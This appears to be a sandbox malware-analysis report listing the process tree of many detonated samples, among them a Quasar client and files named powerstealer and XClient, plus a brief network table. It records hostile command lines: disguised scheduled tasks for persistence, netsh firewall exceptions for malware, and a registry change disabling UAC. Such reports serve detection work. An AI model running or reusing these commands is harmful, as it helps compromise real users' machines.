"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1S2mZNnufXOJ.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\AppData\Roaming\$77Security.exe

C:\Users\Admin\AppData\Roaming\$77Security.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\4DAeqXvwV6Ud.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YeiwQ7RofxNs.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\Desktop\Files\q1wnx5ir.exe

"C:\Users\Admin\Desktop\Files\q1wnx5ir.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 7176 -ip 7176

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 7176 -s 416

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\gsWPoyEdbx0v.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\Desktop\Files\Rage.exe

"C:\Users\Admin\Desktop\Files\Rage.exe"

C:\ProgramData\wvtynvwe\AutoIt3.exe

"C:\ProgramData\wvtynvwe\AutoIt3.exe" C:\ProgramData\wvtynvwe\clxs.a3x

C:\Users\Admin\Desktop\Files\856.exe

"C:\Users\Admin\Desktop\Files\856.exe"

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\Desktop\Files\856.exe" "856.exe" ENABLE

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\netsh.exe

netsh firewall delete allowedprogram "C:\Users\Admin\Desktop\Files\856.exe"

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\Desktop\Files\856.exe" "856.exe" ENABLE

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\Desktop\Files\Ewpeloxttug.exe

"C:\Users\Admin\Desktop\Files\Ewpeloxttug.exe"

C:\Users\Admin\Desktop\Files\ciscotest.exe

"C:\Users\Admin\Desktop\Files\ciscotest.exe"

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe" "svchost.exe" ENABLE

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\Desktop\Files\svc1.exe

"C:\Users\Admin\Desktop\Files\svc1.exe"

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\FransescoPast.txt

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zblqEg0ftqZ0.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\Desktop\Files\alexshlu.exe

"C:\Users\Admin\Desktop\Files\alexshlu.exe"

C:\Users\Admin\Desktop\Files\alexshlu.exe

"C:\Users\Admin\Desktop\Files\alexshlu.exe"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\SysWOW64\netsh.exe

netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe" "svchost.exe" ENABLE

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /sc minute /mo 1 /tn StUpdate /tr C:\Users\Admin\AppData\Local\Temp/StUpdate.exe

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\StUpdate.exe

"C:\Users\Admin\AppData\Local\Temp\StUpdate.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zblqEg0ftqZ0.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HG73Nmet0qaJ.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\melt.txt

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Users\Admin\Desktop\Files\Ewpeloxttug.exe

"C:\Users\Admin\Desktop\Files\Ewpeloxttug.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tFMKq6EdJqBP.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Roaming\$77Security.exe

C:\Users\Admin\AppData\Roaming\$77Security.exe

C:\Windows\system32\chcp.com

chcp 65001

C:\ProgramData\sommnx\bmxe.exe

C:\ProgramData\sommnx\bmxe.exe

C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Local\Temp\StUpdate.exe

C:\Users\Admin\AppData\Local\Temp/StUpdate.exe

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tel0N9UQ34hY.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\Desktop\Files\msf.exe

"C:\Users\Admin\Desktop\Files\msf.exe"

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 6200 -ip 6200

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 6200 -s 1236

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 6200 -ip 6200

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 6200 -s 1244

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /0

C:\ProgramData\sommnx\bmxe.exe

"C:\ProgramData\sommnx\bmxe.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Rps1Drc3i6nT.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe

"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /0

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\LoDrERSbzhN2.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 796 -ip 796

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 796 -s 1916

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\Desktop\Files\jignesh.exe

"C:\Users\Admin\Desktop\Files\jignesh.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "ctfmon" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Users\Admin\Desktop\Files\NOTallowedtocrypt.exe

"C:\Users\Admin\Desktop\Files\NOTallowedtocrypt.exe"

C:\Windows\SysWOW64\cmd.exe

/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BvcyyA97w0hk.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Roaming\SubDir\Client.exe

"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "ctfmon" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Roaming\kjhgfdc\76y5trfed675ytg.exe

"C:\Users\Admin\AppData\Roaming\kjhgfdc\76y5trfed675ytg.exe"

C:\Windows\SysWOW64\reg.exe

C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\cmd.exe

/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

\??\c:\program files (x86)\internet explorer\iexplore.exe

"c:\program files (x86)\internet explorer\iexplore.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cmd.exe

/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Users\Admin\Desktop\Files\svchost.exe

svchost.exe

C:\Windows\SysWOW64\rmclient.exe

rmclient.exe

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x00000000000004BC 0x00000000000004C8

C:\Windows\SysWOW64\reg.exe

C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\Desktop\Files\yoyf.exe

"C:\Users\Admin\Desktop\Files\yoyf.exe"

C:\Users\Admin\Desktop\Files\SharpHound.exe

"C:\Users\Admin\Desktop\Files\SharpHound.exe"

C:\Users\Admin\Desktop\Files\winX32.exe

"C:\Users\Admin\Desktop\Files\winX32.exe"

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Users\Admin\AppData\Roaming\$77Security.exe

C:\Users\Admin\AppData\Roaming\$77Security.exe

C:\ProgramData\sommnx\bmxe.exe

C:\ProgramData\sommnx\bmxe.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Local\Temp\StUpdate.exe

C:\Users\Admin\AppData\Local\Temp/StUpdate.exe

C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\g9SSX2bshVB0.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\Desktop\Files\SharpHound.exe

"C:\Users\Admin\Desktop\Files\SharpHound.exe"

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Users\Admin\Desktop\Files\winX32.exe

"C:\Users\Admin\Desktop\Files\winX32.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WZk6Sw3oUfda.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /0

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\ProgramData\sommnx\bmxe.exe

"C:\ProgramData\sommnx\bmxe.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\UJFyZlg1NKTf.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\Desktop\Files\jignesh.exe

"C:\Users\Admin\Desktop\Files\jignesh.exe"

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\pHW7WegWhary.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\Desktop\Files\Discord.exe

"C:\Users\Admin\Desktop\Files\Discord.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\powerstealer.exe" /rl HIGHEST /f

C:\Users\Admin\AppData\Roaming\SubDir\powerstealer.exe

"C:\Users\Admin\AppData\Roaming\SubDir\powerstealer.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\powerstealer.exe" /rl HIGHEST /f

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\gM7yqR5MXayd.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\qaFVyoxPIEUe.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\AppData\Roaming\$77Security.exe

C:\Users\Admin\AppData\Roaming\$77Security.exe

C:\ProgramData\sommnx\bmxe.exe

C:\ProgramData\sommnx\bmxe.exe

C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\StUpdate.exe

C:\Users\Admin\AppData\Local\Temp/StUpdate.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YPe0OYzvdTtm.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\uLv2aTQc0OcY.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\ProgramData\sommnx\bmxe.exe

"C:\ProgramData\sommnx\bmxe.exe"

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\XwvStCtpEqoJ.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\j1goxeU1EauG.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Users\Admin\AppData\Roaming\$77Security.exe

C:\Users\Admin\AppData\Roaming\$77Security.exe

C:\ProgramData\sommnx\bmxe.exe

C:\ProgramData\sommnx\bmxe.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Local\Temp\StUpdate.exe

C:\Users\Admin\AppData\Local\Temp/StUpdate.exe

C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\eOhLQcJh0MZU.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rTQ5Dc2zbKug.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

Network

Country Destination Domain Proto
US 8.8.8.8:53 www.mozilla.org udp
US 8.8.8.8:53 spocs.getpocket.com udp
N/A 127.0.0.1:49827 tcp
US 151.101.67.19:443 www.mozilla.org tcp
US 151.101.67.19:443 www.mozilla.org tcp
US 8.8.8.8:53 prod.ads.prod.webservices.mozgcp.net udp
US 151.101.67.19:443 www.mozilla.org tcp
US 34.149.97.1:443 firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net udp
N/A 127.0.0.1:49836 tcp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 support.mozilla.org udp
